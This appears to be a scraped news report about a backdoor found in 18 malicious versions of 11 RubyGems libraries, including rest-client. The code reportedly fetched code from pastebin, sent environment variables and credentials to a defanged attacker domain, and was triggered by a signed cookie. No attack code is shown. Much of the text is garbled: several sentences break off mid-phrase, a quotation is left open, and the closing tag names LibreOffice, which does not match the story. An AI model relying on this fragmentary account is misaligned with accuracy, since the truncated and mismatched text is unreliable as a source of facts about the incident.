Maintainers of the RubyGems package repository have discovered a backdoor mechanism in 18 malicious versions of 11 Ruby libraries.
One of the most popular Ruby libraries, the rest-client, was found containing the malicious code yesterday.
The malicious code was included in four versions of rest-client.
“It seems that rest-client 1.6.13 is uploaded to rubygems.org. I did review between 1.6.9 and 1.6.13 and it seems that latest version evaluate remote code from pastebin.com and sends information to mironanoru[.]zzz.com [.
The Ruby developer Jan Dintel, who analyzed the code, discovered it would collect and send the environment variables of a compromised system (i.e. credentials of services used by the compromised system such as use
“Depending on your
The backdoor mechanism could be triggered by the attacker by sending a signed cookie, then the code will send captured credentials back to the attackers. The backdoor
The attacker is believed to be active for more than a month without being detected until the account of rest-client developer Matthew Manning was compromised to push four malicious versions of rest-client on RubyGems.
The total number of malicious versions of the libraries was 18 and were downloaded 3,584 before being removed from RubyGems.
Projects that rely on the
In production, the code would download a payload from Pastebin.com and execute it to create the actual backdoor in the application that used the strong_password library.
(SecurityAffairs – LibreOffice, hacking)
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.